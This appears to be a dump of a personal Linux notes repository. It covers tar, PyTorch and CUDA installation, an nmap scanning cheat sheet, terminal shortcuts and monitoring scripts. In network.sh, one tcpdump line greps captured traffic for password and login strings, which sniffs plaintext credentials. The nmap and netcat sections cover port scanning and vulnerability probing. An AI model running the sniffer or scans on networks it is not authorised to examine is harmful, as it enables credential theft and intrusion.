mode. The v is always optional in these commands, but it’s helpful. 13 | - f: Allows you to specify the filename of the archive.
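As a quick sanity check of the flags above, swapping c for t lists an archive's contents instead of creating one. A small sketch with throwaway example paths (the demo/ tree is illustrative):

```shell
# build a tiny directory tree and archive it with the flags described above
mkdir -p demo/dir
echo hello > demo/dir/file.txt
tar -czf demo/archive.tar.gz -C demo dir

# t replaces c: list the archive's contents instead of creating it
tar -tzf demo/archive.tar.gz
```

The -C demo option makes tar record paths relative to demo, so the listing shows dir/file.txt rather than the full path.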
14 | 15 | 16 | ### Compress Multiple Directories or Files at Once 17 | 18 | ``` 19 | tar -czvf archive.tar.gz /home/ubuntu/Downloads /usr/local/stuff /home/ubuntu/Documents/notes.txt 20 | ``` 21 | 22 | ### Extract an Archive 23 | 24 | 25 | ``` 26 | tar -xzvf archive.tar.gz 27 | ``` 28 | 29 | 30 | Extract the contents of the archive to a specific directory: 31 | 32 | ``` 33 | tar -xzvf archive.tar.gz -C /tmp 34 | ``` 35 | 36 | ## Reference 37 | 38 | - [How to Compress and Extract Files Using the tar Command on Linux](https://www.howtogeek.com/248780/how-to-compress-and-extract-files-using-the-tar-command-on-linux/) -------------------------------------------------------------------------------- /linux/install-pytorch-on-palmetto.md: -------------------------------------------------------------------------------- 1 | 2 | ## Install pytorch on palmetto 3 | 4 | 5 | ### 1. Use the conda create command to create a conda environment. 6 | 7 | ``` 8 | $ module add anaconda3/5.1.0 9 | $ module add cuda-toolkit/9.0.176 10 | $ module add cuDNN/9.0v7.3.0 11 | $ conda create -n pytorch python=3.6 12 | $ source activate pytorch 13 | ``` 14 | 15 | If you want to install a specific pytorch version, please follow this [link](https://pytorch.org/get-started/previous-versions/); note that you also need to add the matching cuda-toolkit and cuDNN modules to support the pytorch version you install. For example, to install pytorch 1.0.1: 16 | 17 | ``` 18 | pip install torch==1.0.1 torchvision==0.2.2 19 | ``` 20 | 21 | OR 22 | 23 | ``` 24 | conda install pytorch==1.0.1 torchvision==0.2.2 cudatoolkit=9.0 -c pytorch 25 | ``` 26 | 27 | The following steps are for installation from source; if you used the commands above to install, you don't need to run them. 28 | 29 | ### 2.
Install torch from source 30 | 31 | ``` 32 | export CXXFLAGS="-std=c++11" 33 | export CFLAGS="-std=c99" 34 | 35 | cd /home/feid/.conda/envs/pytorch/ 36 | git clone https://github.com/torch/distro.git ./torch --recursive 37 | cd ./torch; bash install-deps; 38 | ./install.sh 39 | ``` 40 | 41 | ### 3. Install pytorch from source 42 | 43 | ``` 44 | $ export CMAKE_PREFIX_PATH="/home/feid/.conda/envs/pytorch/" # [anaconda root directory] 45 | 46 | # Install basic dependencies 47 | 48 | $ conda install numpy pyyaml mkl mkl-include setuptools cmake cffi typing 49 | 50 | # Add LAPACK support for the GPU 51 | 52 | $ conda install -c pytorch magma-cuda80 # or magma-cuda90 if CUDA 9 53 | 54 | $ git clone --recursive https://github.com/pytorch/pytorch 55 | 56 | $ cd pytorch 57 | 58 | $ python setup.py install 59 | ``` 60 | 61 | OR use conda: 62 | 63 | ``` 64 | $ conda install pytorch torchvision -c pytorch 65 | ``` 66 | 67 | 68 | ### 4. Install Warp-CTC bindings 69 | 70 | Note: CUDA_HOME should be set like this: `export CUDA_HOME="/software/cuda-toolkit/8.0.44/"` 71 | 72 | Note: you need to activate torch first. 73 | 74 | ``` 75 | git clone https://github.com/SeanNaren/warp-ctc.git 76 | cd warp-ctc 77 | mkdir build; cd build 78 | cmake .. 79 | make 80 | cd ../pytorch_binding 81 | python setup.py install 82 | 83 | . /home/feid/.conda/envs/pytorch/torch/install/bin/torch-activate 84 | th 85 | ``` 86 | 87 | ### 5. Install pysoundfile 88 | 89 | ``` 90 | conda install cffi numpy 91 | pip install pysoundfile 92 | ``` 93 | -------------------------------------------------------------------------------- /linux/install_cuda10.txt: -------------------------------------------------------------------------------- 1 | 1.
Add NVIDIA package repositories 2 | 3 | wget https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-repo-ubuntu1804_10.0.130-1_amd64.deb 4 | sudo dpkg -i cuda-repo-ubuntu1804_10.0.130-1_amd64.deb 5 | sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/7fa2af80.pub 6 | sudo apt-get update 7 | wget http://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64/nvidia-machine-learning-repo-ubuntu1804_1.0.0-1_amd64.deb 8 | sudo apt install ./nvidia-machine-learning-repo-ubuntu1804_1.0.0-1_amd64.deb 9 | sudo apt-get update 10 | 11 | 2. Install driver 12 | 13 | sudo add-apt-repository ppa:graphics-drivers 14 | sudo apt-get update 15 | 16 | sudo apt-get install --no-install-recommends nvidia-driver-418 17 | 18 | sudo apt-get install nvidia-kernel-source-430 19 | sudo apt-get install nvidia-kernel-common-430 20 | sudo apt-get install nvidia-driver-430 21 | 22 | 3. Don’t forget to REBOOT 23 | 24 | # Check that GPUs are visible using the command: nvidia-smi 25 | 26 | 4. 
Install development and runtime libraries (~4GB) 27 | 28 | sudo apt-get install --no-install-recommends \ 29 | cuda-10-0 \ 30 | libcudnn7=7.6.0.64-1+cuda10.0 \ 31 | libcudnn7-dev=7.6.0.64-1+cuda10.0 32 | 33 | 34 | Reference: 35 | 36 | https://www.tensorflow.org/install/gpu 37 | 38 | https://www.videogames.ai/Install-CUDA-10-Ubuntu-18-04-18-10 -------------------------------------------------------------------------------- /linux/nmap-cheat-sheet.md: -------------------------------------------------------------------------------- 1 | Nmap Cheat Sheet 2 | ========== 3 | 4 | 5 | ### Nmap Target Selection 6 | 7 | ```sh 8 | #Scan a single IP 9 | nmap 192.168.1.1 10 | 11 | #Scan a host 12 | nmap www.testhostname.com 13 | 14 | #Scan a range of IPs 15 | nmap 192.168.1.1-20 16 | 17 | #Scan a subnet 18 | nmap 192.168.1.0/24 19 | 20 | #Scan targets from a text file 21 | nmap -iL list-of-ips.txt 22 | ``` 23 | 24 | ### Nmap Port Selection 25 | 26 | ```sh 27 | #Scan a single Port 28 | nmap -p 22 192.168.1.1 29 | 30 | #Scan a range of ports 31 | nmap -p 1-100 192.168.1.1 32 | 33 | #Scan 100 most common ports (Fast) 34 | nmap -F 192.168.1.1 35 | 36 | #Scan all 65535 ports 37 | nmap -p- 192.168.1.1 38 | ``` 39 | 40 | ### Nmap Port Scan types 41 | 42 | ```sh 43 | #Scan using TCP connect 44 | nmap -sT 192.168.1.1 45 | 46 | #Scan using TCP SYN scan (default) 47 | nmap -sS 192.168.1.1 48 | 49 | #Scan UDP ports 50 | nmap -sU -p 123,161,162 192.168.1.1 51 | 52 | #Scan selected ports - ignore discovery 53 | nmap -Pn -F 192.168.1.1 54 | ``` 55 | 56 | ### Service and OS Detection 57 | 58 | ```sh 59 | #Detect OS and Services 60 | nmap -A 192.168.1.1 61 | 62 | #Standard service detection 63 | nmap -sV 192.168.1.1 64 | 65 | #More aggressive Service Detection 66 | nmap -sV --version-intensity 5 192.168.1.1 67 | 68 | #Lighter banner grabbing detection 69 | nmap -sV --version-intensity 0 192.168.1.1 70 | ``` 71 | 72 | ### Nmap Output Formats 73 | 74 | ```sh 75 | #Save default output to file 76 | 
nmap -oN outputfile.txt 192.168.1.1 77 | 78 | #Save results as XML 79 | nmap -oX outputfile.xml 192.168.1.1 80 | 81 | #Save results in a format for grep 82 | nmap -oG outputfile.txt 192.168.1.1 83 | 84 | #Save in all formats 85 | nmap -oA outputfile 192.168.1.1 86 | ``` 87 | 88 | ### Digging deeper with NSE Scripts 89 | 90 | ```sh 91 | #Scan using default safe scripts 92 | nmap -sV -sC 192.168.1.1 93 | 94 | #Get help for a script 95 | nmap --script-help=ssl-heartbleed 96 | 97 | #Scan using a specific NSE script 98 | nmap -sV -p 443 --script=ssl-heartbleed.nse 192.168.1.1 99 | 100 | #Scan with a set of scripts 101 | nmap -sV --script=smb* 192.168.1.1 102 | ``` 103 | 104 | The option --script-help=$scriptname will display help for the individual scripts. To get an easy list of the installed scripts try locate nse | grep script. 105 | 106 | You will notice I have used the -sV service detection parameter. Generally most NSE scripts will be more effective and you will get better coverage by including service detection. 107 | 108 | **A scan to search for DDOS reflection UDP services** 109 | 110 | ```sh 111 | #Scan for UDP DDOS reflectors 112 | nmap -sU -A -PN -n -pU:19,53,123,161 --script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.1.0/24 113 | ``` 114 | 115 | UDP based DDOS reflection attacks are a common problem that network defenders come up against. This is a handy Nmap command that will scan a target list for systems with open UDP services that allow these attacks to take place. Full details of the command and the background can be found on the [Sans Institute Blog](https://isc.sans.edu/diary/Using+nmap+to+scan+for+DDOS+reflectors/18193) where it was first posted.
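The grepable -oG format shown above pairs well with a quick awk pass. A hedged sketch; the scan lines written to scan.gnmap below are illustrative sample data, not output from a real scan:

```shell
# write sample grepable nmap output to a file (illustrative data)
printf 'Host: 192.168.1.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\nHost: 192.168.1.9 ()\tPorts: 80/closed/tcp//http///\n' > scan.gnmap

# print the address (second field) of every host with port 80 open
awk '/80\/open/ {print $2}' scan.gnmap
```

Only the first sample host matches, so this prints 192.168.1.1.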
116 | 117 | ### HTTP Service Information 118 | 119 | ```sh 120 | #Gather page titles from HTTP services 121 | nmap --script=http-title 192.168.1.0/24 122 | 123 | #Get HTTP headers of web services 124 | nmap --script=http-headers 192.168.1.0/24 125 | 126 | #Find web apps from known paths 127 | nmap --script=http-enum 192.168.1.0/24 128 | ``` 129 | There are many HTTP information gathering scripts; here are a few that are simple but helpful when examining larger networks. They help quickly identify which HTTP service is running on the open port. Note the http-enum script is particularly noisy. 130 | 131 | ### Detect Heartbleed SSL Vulnerability 132 | 133 | ```sh 134 | #Heartbleed Testing 135 | nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24 136 | ``` 137 | Heartbleed detection is one of the available SSL scripts. It will detect the presence of the well known Heartbleed vulnerability in SSL services. Specify alternative ports to test SSL on mail and other protocols. 138 | 139 | **IP Address information** 140 | 141 | ```sh 142 | #Find Information about IP address 143 | nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24 144 | ``` 145 | 146 | Gather information related to the IP address and netblock owner of the IP address. Uses ASN, whois and geoip location lookups. 147 | 148 | ### Reference 149 | 150 | * [Nmap Cheat Sheet](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/) -------------------------------------------------------------------------------- /linux/ping_ok.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # -q quiet 4 | # -c nb of pings to perform 5 | # @Usage 6 | # $ ./ping_ok.sh 7 | 8 | ping -q -c5 facebook.com > /dev/null 9 | 10 | if [ $?
-eq 0 ] 11 | then 12 | echo "ok" 13 | fi 14 | -------------------------------------------------------------------------------- /linux/terminal-hotkeys.md: -------------------------------------------------------------------------------- 1 | 2 | # Terminal Hotkeys 3 | 4 | ### 1. Terminal shortcuts 5 | 6 | A few common shortcuts in the terminal: 7 | 8 | * `ctrl-a`: move the cursor to the beginning of the line. 9 | * `ctrl-e`: move the cursor to the end of the line. 10 | * `ctrl-w`: cut the word before the cursor (note: cut, not delete; it can be pasted back with `ctrl-y`). 11 | * `ctrl-u`: cut everything before the cursor; if the cursor is at the end of the line, this cuts the whole line. 12 | * `ctrl-k`: cut everything after the cursor, similar to vim's `D` command. 13 | * `ctrl-y`: paste the most recently cut content. 14 | * `ctrl-p`, `ctrl-n`: step backward/forward through the command history, equivalent to the Up and Down arrow keys. 15 | * `ctrl-l`: clear the screen, equivalent to running the `clear` command; note that it does not clear the current input line. 16 | * `ctrl-h`: delete the character before the cursor, same as Backspace. 17 | 18 | A typical scenario: you have typed a long command A but not yet run it, then realize you need to run another command B first and don't want to open a new terminal. There are two ways to save the current input A: 19 | 20 | 1. Use `ctrl-u` to cut the whole line A; after running command B, restore it with `ctrl-y`. Don't perform any other cut operation in between, or the content will be overwritten. 21 | 2. Use `ctrl-a` to move the cursor to the beginning of the line, type `#`, and press Enter. This comments out the line so it isn't executed, but it's still recorded in history; to restore it, use `ctrl-p` to find the command and remove the `#`. 22 | 23 | ### 2. sudo !! 24 | 25 | This trick relies on the shell's (bash's) `History Expansion`. The history command lists the commands we have executed: 26 | 27 | ``` 28 | $ history 29 | 1 tar cvf etc.tar /etc/ 30 | 2 cp /etc/passwd /backup 31 | 3 ps -ef | grep http 32 | 4 service sshd restart 33 | 5 /usr/local/apache2/bin/apachectl restart 34 | ``` 35 | 36 | Each command is preceded by its number. To re-run a command, just type `!` followed by that number; for example, to restart the sshd service again, run: 37 | 38 | ```bash 39 | !4 40 | ``` 41 | 42 | If the number after `!` is negative, it refers to the Nth previous command: `!-1` runs the previous command and `!-5` the fifth-to-last. The previous command can also be re-run with `!!`, i.e. `!-1` and `!!` are equivalent, and `!!` is usually more convenient. A typical scenario: you run a command that needs root privileges but forget to type `sudo`; just run: 43 | 44 | ``` 45 | sudo !! 46 | ``` 47 | 48 | For more on bash History Expansion, see [Linux Bash History Expansion Examples You Should Know](http://www.thegeekstuff.com/2011/08/bash-history-expansion/). 49 | 50 | ### 3.
\^status\^restart\^ 51 | 52 | We often want to re-run the previous command with one argument changed. For example, we check the status of the nova-compute service with `systemctl`: 53 | 54 | ``` 55 | systemctl status openstack-nova-compute 56 | ``` 57 | 58 | If the service turns out to be unhealthy, the very next thing we want to do is probably restart it. All we need to type is: 59 | 60 | ``` 61 | ^status^restart^ 62 | ``` 63 | 64 | The command above is automatically expanded to: 65 | 66 | ``` 67 | systemctl restart openstack-nova-compute 68 | ``` 69 | 70 | ### 4. Edit long commands in an editor 71 | 72 | When a command is very long, typing it directly in the shell is painful, and line breaks are awkward to handle. Instead, you can open your local editor to compose the command: press `ctrl-x` followed by `ctrl-e`. 73 | 74 | -------------------------------------------------------------------------------- /monitor/IO.sh: -------------------------------------------------------------------------------- 1 | #IO.sh 2 | 3 | ## iostat, report CPU statistics and IO statistics for devices, partitions and NFS 4 | ## display a single history since boot report for all CPU and Devices 5 | iostat 6 | 7 | ## display a continuous device report at two second intervals 8 | iostat -d 2 9 | 10 | ## display six reports at two second intervals for all devices 11 | iostat -d 2 6 12 | 13 | 14 | ## print the time for each report displayed 15 | iostat -t 16 | 17 | ## display statistics in megabytes per second 18 | iostat -m 19 | 20 | ## display six reports of extended statistics at two second intervals for devices hda and hdb. 21 | iostat -x hda hdb 2 6 22 | 23 | ## display six reports at two second intervals for device sda and all its partitions (sda1, etc.) 24 | iostat -p sda 2 6 25 | 26 | ## -d, display the device utilization report 27 | ## -x, display extended statistics. 28 | ## -k, display statistics in kilobytes per second instead of blocks per second. 29 | iostat -d -x -k 1 1 30 | 31 | ## report statistics for Linux tasks 32 | pidstat 33 | 34 | ## report IO statistics 35 | pidstat -d 1 36 | 37 | 38 | ## display five reports of CPU statistics for every active task in the system at two second intervals.
39 | pidstat 2 5 40 | 41 | ## display five reports of page faults and memory statistics for PID 1643 at two second intervals. 42 | pidstat -r -p 1643 2 5 43 | 44 | 45 | ## list open files 46 | lsof 47 | ls /proc/pid/fd 48 | 49 | ## collect, report, or save system activity information 50 | ## -d, report activity for each block device 51 | sar -pd 10 3 52 | 53 | # simple top-like IO monitor 54 | iotop 55 | 56 | # report a large amount of valuable information about the system RAM usage. 57 | cat /proc/meminfo 58 | 59 | # /proc/sys/vm/ facilitates the configuration of the Linux kernel's virtual memory (VM) subsystem. 60 | # nr_pdflush_threads, indicates the number of pdflush daemons that are currently running. 61 | cat /proc/sys/vm/nr_pdflush_threads 62 | 63 | # IO Scheduler for a hard disk 64 | # noop anticipatory deadline [cfq] 65 | # cfq: completely fair queuing, an IO scheduler for the Linux kernel and the default under many Linux distributions. 66 | # noop: the simplest IO scheduler, based upon the FIFO queue concept. 67 | # anticipatory: old scheduler, replaced by cfq. 68 | # deadline: attempts to guarantee a start service time for each request.
69 | 70 | cat /sys/block/[disk-name]/queue/scheduler 71 | 72 | # to set a specific scheduler, simply type the command as follows: 73 | echo {SCHEDULER-NAME} > /sys/block/{DEVICE-NAME}/queue/scheduler 74 | 75 | # for example, to set the noop scheduler, enter: 76 | echo noop > /sys/block/hda/queue/scheduler 77 | -------------------------------------------------------------------------------- /monitor/README.md: -------------------------------------------------------------------------------- 1 | monitor script 2 | ========== 3 | 4 | 5 | Common shell commands and monitoring scripts 6 | 7 | ### CPU monitor 8 | 9 | - [CPU](cpu.sh) 10 | 11 | ### Memory monitor 12 | 13 | - [Memory](mem_usage.sh) 14 | 15 | ### Disk management 16 | 17 | - [Disk](disk.sh) 18 | 19 | ### Processes 20 | 21 | - [Process](process.sh) 22 | 23 | ### Network 24 | 25 | - [Network](network.sh) 26 | 27 | - [isDDOS](isDDOS.sh) 28 | 29 | - [Nmap Cheat Sheet](nmap-cheat-sheet.md) 30 | 31 | ### IO 32 | 33 | - [IO](IO.sh) 34 | 35 | ### System 36 | 37 | - [awk](awk.sh) 38 | 39 | - [monitor system](monitor_system.sh) 40 | 41 | - [performance tool](performance_tool.sh) 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /monitor/awk.sh: -------------------------------------------------------------------------------- 1 | 2 | # delete duplicate lines in the temp file 3 | awk '!($0 in array) { array[$0]; print }' temp 4 | 5 | # display the 10 most frequently used unix commands 6 | awk '{print $1}' ~/.bash_history | sort | uniq -c | sort -rn | head -n 10 7 | 8 | # list the ip addresses of all interfaces 9 | ifconfig -a | awk '/Bcast/{print $2}' | cut -c 5-19 10 | 11 | # -antu: display all TCP and UDP connections, with numeric addresses and ports.
12 | netstat -antu | awk '$5 ~ /[0-9]:/{split($5, a, ":"); ips[a[1]]++} END {for (ip in ips) print ips[ip], ip | "sort -k1 -nr"}' 13 | 14 | # display the number of open file descriptors of one process 15 | ps aux | grep [process] | awk '{print $2}' | xargs -I % ls /proc/%/fd | wc -l 16 | 17 | 18 | # display the wireless network ip 19 | sudo ifconfig wlan0 | grep inet | awk 'NR==1 {print $2}' | cut -c 6- 20 | 21 | # batch rename 22 | find . -name '*.jpg' | awk 'BEGIN{ a=0 }{ printf "mv %s name%01d.jpg\n", $0, a++ }' | bash 23 | 24 | # display the list of file handles 25 | for x in `ps -u 500 u | grep java | awk '{ print $2 }'`;do ls /proc/$x/fd|wc -l;done 26 | 27 | # sum of the first column 28 | awk '{s+=$1}END{print s}' temp 29 | 30 | # display the most frequently used commands and their usage counts 31 | history | awk '{if ($2 == "sudo") a[$3]++; else a[$2]++}END{for(i in a){print a[i] " " i}}' | sort -rn | head 32 | 33 | # copy the files with a certain timestamp 34 | cp -p `ls -l | awk '/Apr 14/ {print $NF}'` /usr/users/backup_dir 35 | 36 | # print current process information in a custom format 37 | ps -ef | awk -v OFS="\n" '{ for (i=8;i<=NF;i++) line = (line ?
line FS : "") $i; print NR ":", $1, $2, $7, line, ""; line = "" }' 38 | 39 | # print a single character (an empty FS splits the input on every character; this prints the 2nd) 40 | echo "abcdefg"|awk 'BEGIN {FS="''"} {print $2}' 41 | 42 | # print each line with its record number (NR) 43 | ls | awk '{print NR "\t" $0}' 44 | 45 | # print the ssh client 46 | netstat -tn | awk '($4 ~ /:22\s*/) && ($6 ~ /^EST/) {print substr($5, 0, index($5,":"))}' 47 | 48 | # print only lines whose first column has not been seen before (deduplicate by the first column) 49 | awk '!array[$1]++' file.txt 50 | 51 | # print the unique values of the second column 52 | awk '{ a[$2]++ } END { for (b in a) { print b } }' file 53 | 54 | # display all the system partitions 55 | awk '{if ($NF ~ "^[a-zA-Z].*[0-9]$" && $NF !~ "c[0-9]+d[0-9]+$" && $NF !~ "^loop.*") print "/dev/"$NF}' /proc/partitions 56 | 57 | # display all the prime numbers from 2 through 100 58 | for num in `seq 2 100`;do if [ `factor $num|awk '{print $2}'` == $num ];then echo -n "$num ";fi done;echo 59 | 60 | # display records 3 through 6 61 | awk 'NR >= 3 && NR <= 6' /path/to/file 62 | 63 | # display the file in reversed order 64 | awk '{a[i++]=$0} END {for (j=i-1; j>=0;) print a[j--] }' 65 | 66 | # print 9x9 multiplication table 67 | seq 9 | sed 'H;g' | awk -v RS='' '{for(i=1;i<=NF;i++)printf("%dx%d=%d%s", i, NR, i*NR, i==NR?"\n":"\t")}' 68 | -------------------------------------------------------------------------------- /monitor/cpu.sh: -------------------------------------------------------------------------------- 1 | 2 | # limit one process's cpu usage 3 | sudo cpulimit -p pid -l 50 4 | ps -eo %cpu,args | grep -m1 PROCESS | awk '{print $1}' 5 | 6 | # sort the current processes by memory and cpu usage 7 | ps aux --sort=%mem,%cpu 8 | 9 | # sort by cpu usage, dropping idle entries 10 | ps -e -o pcpu,cpu,nice,state,cputime,args --sort pcpu | sed "/^ 0.0 /d" 11 | 12 | # count the cpus on the current system 13 | grep "processor" /proc/cpuinfo | wc -l 14 | grep -c -e '^cpu[0-9]\+' /proc/stat 15 | 16 | # check the cpu information 17 | cat /proc/cpuinfo 18 | 19 | # check the
model name of cpu 20 | grep "model name" /proc/cpuinfo 21 | 22 | # check whether the system is 64-bit or 32-bit (lm is the long-mode cpu flag) 23 | grep -q '\<lm\>' /proc/cpuinfo && echo 64 bits || echo 32 bits 24 | getconf LONG_BIT | grep '64' 25 | java -version 26 | 27 | # check the cpu MHz 28 | awk -F": " '/cpu MHz\ */ { print "Processor (or core) running speed is: " $2 }' /proc/cpuinfo ; dmidecode | awk -F": " '/Current Speed/ { print "Processor real speed is: " $2 }' 29 | 30 | # check per-process cpu usage on each cpu 31 | ps ax -L -o pid,tid,psr,pcpu,args | sort -nr -k4| head -15 | cut -c 1-90 32 | 33 | # check interrupts 34 | cat /proc/interrupts 35 | 36 | # check cpu core numbers 37 | cat /proc/cpuinfo | grep "cpu cores" | uniq | awk -F: '{print $2}' 38 | 39 | # The number of siblings on a processor is the total number of execution units within that processor. 40 | # This will include both additional cores and hyperthreading. 41 | cat /proc/cpuinfo | grep "siblings" 42 | 43 | # The "intr" line gives counts of interrupts serviced since boot time, 44 | # for each of the possible system interrupts. The first column is the total of all interrupts serviced; 45 | # each subsequent column is the total for that particular interrupt. 46 | cat /proc/stat | grep intr 47 | -------------------------------------------------------------------------------- /monitor/disk.sh: -------------------------------------------------------------------------------- 1 | 2 | # sort by size, showing the 15 largest files or directories 3 | du -xB M --max-depth=2 /var | sort -rn | head -n 15 4 | 5 | # list all the sub directory file size 6 | du -h --max-depth=1 7 | 8 | # list the top 10 largest entries 9 | du -s * | sort -n | tail 10 | 11 | # sort directories by size, printing human-readable units 12 | du -b --max-depth 1 | sort -nr | perl -pe 's{([0-9]+)}{sprintf "%.1f%s", $1>=2**30? ($1/2**30, "G"): $1>=2**20? ($1/2**20, "M"): $1>=2**10?
($1/2**10, "K"): ($1, "")}e' 13 | 14 | # list the directory tree under the path, sorted by human-readable size 15 | du -h /path | sort -h 16 | 17 | # monitor the size of the directory every 60s 18 | watch -n60 du /var/log/messages 19 | 20 | # recursively delete .svn directories 21 | find . -type d -name '.svn' -print0 | xargs -0 rm -rdf 22 | 23 | # list the disk usage 24 | df -P | column -t 25 | df -h 26 | 27 | # monitor disk usage 28 | watch -d -n 5 df 29 | 30 | # list the inode usage 31 | df -i 32 | 33 | # sort partitions by disk usage, keeping the header line 34 | df -h | grep -v ^none | ( read header ; echo "$header" ; sort -rn -k 5) 35 | 36 | # check the disk usage 37 | df -x tmpfs | grep -vE "(gvfs|procbususb|rootfs)" 38 | 39 | # show the partition table of a disk 40 | fdisk -l /dev/sda 41 | 42 | # show all the partitions 43 | fdisk -l 44 | 45 | # show sectors 46 | fdisk -u 47 | 48 | # show the size in blocks of a partition 49 | fdisk -s partition 50 | 51 | # assess disk performance with the iostat command 52 | iostat -m -d /dev/sda1 53 | 54 | # hdparm is a command-line utility to set and view ATA and SATA hard disk drive hardware parameters 55 | hdparm -t /dev/sda 56 | 57 | # find all links to one file 58 | find -L / -samefile /path/to/file -exec ls -ld {} + 59 | 60 | # check the top 5 largest files 61 | find . -type f -exec ls -s {} \; | sort -n -r | head -5 62 | 63 | # find files not modified in the last 365 days and delete them 64 | find ./ -type f -mtime +365 -exec rm -f {} \; 65 | 66 | # check the files larger than 100M 67 | find .
-type f -size +100M 68 | -------------------------------------------------------------------------------- /monitor/isDDOS.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | netstat -antu | awk '$4 ~ /:(22|25|80|2222|443)$/{print $4" "$6}' | sed -n -e '/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/p' |sed -n -e '/ESTABLISHED\|SYN/p' |sed 's/::ffff://' |cut -d: -f1 |xargs -n 1 host 2>/dev/null |awk '{if ($NF ~ /NXDOMAIN/) print $2; else print $NF;}' |sort |uniq -c |sort -nr |awk '($1 >= 2){print $1" cons to "$2" on local addr"}'; 4 | 5 | netstat -antu | awk '$5 ~ /:(22|25|80|2222|443)$/{print $5" "$6}' | sed -n -e '/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/p' |sed -n -e '/ESTABLISHED\|SYN/p' |sed 's/::ffff://' |cut -d: -f1 |xargs -n 1 host |awk '{if ($NF ~ /NXDOMAIN/) print $2; else print $NF;}' |sort |uniq -c |sort -nr |awk '($1 >= 2){print $1" cons to "$2" on foreign addr"}'; -------------------------------------------------------------------------------- /monitor/mem_usage.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | MemTotal=0 3 | MemAvailable=0 4 | while read name amount unit; do 5 | if [[ $name == "MemTotal:" ]]; then 6 | MemTotal=$amount 7 | elif [[ $name == "MemAvailable:" ]]; then 8 | MemAvailable=$amount 9 | fi 10 | done < /proc/meminfo 11 | printf '%3d\n' $(( (MemTotal-MemAvailable)*100/MemTotal )) 12 | -------------------------------------------------------------------------------- /monitor/monitor_system.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # monitor system: cpu, memory, io, network 4 | # the sar command is used to collect, report & save CPU, Memory, I/O usage in Unix 5 | # e.g. on CentOS 7: yum install sysstat 6 | # @Usage 7 | # $ ./monitor-system.sh 8 | # 9 | 10 | EVERY=10 11 | TIMES=30 12 | 13 | LOG_PATH="monitor_logs" 14 | 15 | if !
[ -d $LOG_PATH ]; then 16 | mkdir -p $LOG_PATH 17 | fi 18 | 19 | cur_date="`date +%Y%m%d`" 20 | 21 | top_log_path=$LOG_PATH'/top_'$cur_date'.log' 22 | cpu_log_path=$LOG_PATH'/cpu_'$cur_date'.log' 23 | memory_log_path=$LOG_PATH'/memory_'$cur_date'.log' 24 | io_log_path=$LOG_PATH'/io_'$cur_date'.log' 25 | network_log_path=$LOG_PATH'/network_'$cur_date'.log' 26 | 27 | # total performance monitor 28 | top -s $EVERY -n $TIMES >> $top_log_path 2>&1 & 29 | 30 | # cpu monitor 31 | sar $EVERY $TIMES >> $cpu_log_path 2>&1 & 32 | 33 | # memory monitor 34 | vmstat $EVERY $TIMES >> $memory_log_path 2>&1 & 35 | 36 | # IO monitor 37 | iostat $EVERY $TIMES >> $io_log_path 2>&1 & 38 | 39 | # network monitor 40 | sar -n DEV $EVERY $TIMES >> $network_log_path 2>&1 & 41 | -------------------------------------------------------------------------------- /monitor/network.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # check the header of an http request 4 | tcpdump -s 1024 -l -A -n host 192.168.9.56 5 | tcpdump -s 1024 -l -A src 192.168.9.56 or dst 192.168.9.56 6 | sudo tcpdump -A -s 1492 dst port 80 7 | 8 | # check traffic from host 192.168.0.5 9 | sudo tcpdump -i eth0 src host 192.168.0.5 10 | 11 | # check the tcp packets of eth0 http requests 12 | tcpdump -i eth0 port http 13 | tcpdump -i eth0 port http or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' 14 | 15 | 16 | # check the packets of tcp, udp, icmp but not ssh 17 | tcpdump -n -v tcp or udp or icmp and not port 22 18 | 19 | 20 | # check the packets of http requests 21 | sudo tcpdump -i eth0 port 80 -w - 22 | 23 | # filter the get and host headers of http traffic 24 | sudo tcpdump -i en1 -n -s 0 -w - | grep -a -o -E "GET \/.*|Host\: .*" 25 | 26 | # the response packets of DNS query requests 27 | sudo tcpdump -i en0 'udp port 53' 28 | 29 | # nmap -sP, Ping
echo to scan a subnet 30 | nmap -sP 192.168.0.1 31 | nmap -sP 192.168.0.0/24 32 | nmap -O www.baidu.com 33 | 34 | # netstat, print network connections, routing tables, interface statistics and so on 35 | netstat -a 36 | netstat -nlp 37 | 38 | # netcat to scan ports 39 | nc -z -v -n 172.31.100.7 21-25 40 | 41 | # netcat to connect to port 21 42 | nc -v 172.31.100.7 21 43 | 44 | # print routing tables 45 | route 46 | 47 | # tell how long the system has been running, how many users are currently logged on, 48 | # and the system load averages for the past 1, 5, and 15 minutes. 49 | uptime 50 | 51 | # iftop, display bandwidth usage on an interface by host, i.e. eth1 52 | iftop -i eth1 53 | 54 | # display bandwidth rates in bytes/sec rather than bits/sec 55 | iftop -B 56 | 57 | # don't do hostname lookups 58 | iftop -n 59 | 60 | # don't resolve port numbers to service names 61 | iftop -N 62 | 63 | # specifies an IPv4 network for traffic analysis 64 | iftop -F 192.168.1.0/24 or 192.168.1.0/255.255.255.0 65 | 66 | # displays the current network usage, i.e. eth0 67 | nload -n eth0 68 | 69 | # interactive colorful IP LAN monitor that generates various network statistics including TCP 70 | # info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, 71 | # and others. More powerful than nload 72 | iptraf 73 | 74 | # ifconfig, configure a network interface 75 | # it is obsolete; for a replacement check ip addr and ip link. For statistics use ip -s link. 76 | ifconfig 77 | 78 | 79 | # query or control network driver and hardware settings 80 